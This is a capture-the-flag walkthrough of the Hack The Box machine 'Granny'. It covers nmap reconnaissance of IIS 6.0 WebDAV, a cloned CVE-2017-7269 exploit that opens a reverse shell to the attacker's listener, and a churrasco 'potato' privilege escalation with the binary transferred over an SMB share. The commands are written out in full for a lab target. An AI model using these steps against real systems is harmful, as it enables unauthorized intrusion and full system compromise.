Box: Granny
Level: Easy
OS: Windows
Lets get started
Recon
Portscanning
command:sudo nmap -A 10.129.56.178 -T4 -v -p-
# Nmap 7.93 scan initiated Thu Sep 21 23:02:51 2023 as: nmap -A -T4 -v -p- -oN granny 10.129.56.178
Nmap scan report for 10.129.56.178
Host is up (0.16s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| WebDAV type: Unknown
| Server Date: Thu, 21 Sep 2023 22:08:49 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_ Server Type: Microsoft-IIS/6.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-title: Under Construction
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (90%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%), Microsoft Windows XP SP2 or SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 177.17 ms 10.10.14.1
2 177.19 ms 10.129.56.178
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 21 23:08:58 2023 -- 1 IP address (1 host up) scanned in 367.26 seconds
From our scan we have just 1 open port. This means our enumeration today will be focused on that port.
Enumeration
Navigate to the webpage
There was nothing interesting in the page source.
Going back to the nmap scan I found this
It seems that version of Microsoft IIS httpd
has an exploit
Yeah I was right. Now that we found our attack vector, lets exploit😎
Exploitation
During the search for exploits I found this
You can just clone it, so you’ll be able to use it
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Granny]
└─$ git clone https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269.git
Cloning into 'iis6-exploit-2017-CVE-2017-7269'...
remote: Enumerating objects: 6, done.
remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 6
Receiving objects: 100% (6/6), done.
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Granny]
└─$ cd iis6-exploit-2017-CVE-2017-7269
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Granny/iis6-exploit-2017-CVE-2017-7269]
└─$ ls -la
total 32
drwxr-xr-x 3 bl4ck4non bl4ck4non 4096 Sep 20 17:15 .
drwxr-xr-x 3 bl4ck4non bl4ck4non 4096 Sep 20 17:15 ..
drwxr-xr-x 8 bl4ck4non bl4ck4non 4096 Sep 20 17:15 .git
-rw-r--r-- 1 bl4ck4non bl4ck4non 12313 Sep 20 17:15 'iis6 reverse shell'
-rw-r--r-- 1 bl4ck4non bl4ck4non 66 Sep 20 17:15 README.md
Lets try to run the exploit
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Granny/iis6-exploit-2017-CVE-2017-7269]
└─$ python2 iis6\ reverse\ shell
usage:iis6webdav.py targetip targetport reverseip reverseport
So, we have to specify the targetip and targetport, also our tun0 ip address and the port we plan on listening on
Lets start out by setting up our netcat listener
Now, lets run the exploit
command:python2 iis6\ reverse\ shell 10.129.127.13 80 10.10.14.142 1234
Checking our netcat listener,
We got a shell as nt authority\network service
. Lets go ahead and escalate our privileges
Privilege Escalation
Running the whoami /priv
command
As we can see SeImpersonatePrivilege
is enabaled, so this may be vulnerable to a potato exploit.
We can try churrasco here
We’ll be transferring that to the target machine, now certutil
and curl
doesn’t work on the target machine. This means we’ll be sending the file over to the target using smb
Run this command in the directory where you downloaded the file
command:smbserver.py share .
On the target machine,
command:copy \\10.10.14.142\share\churrasco.exe potato.exe
Now that we’ve successfully transferred the executable, lets run it
command:potato.exe -d "cmd.exe"
We have successfully escalated our privileges, which means we have successfully pwned this box😎
That will be all for today
Back To Home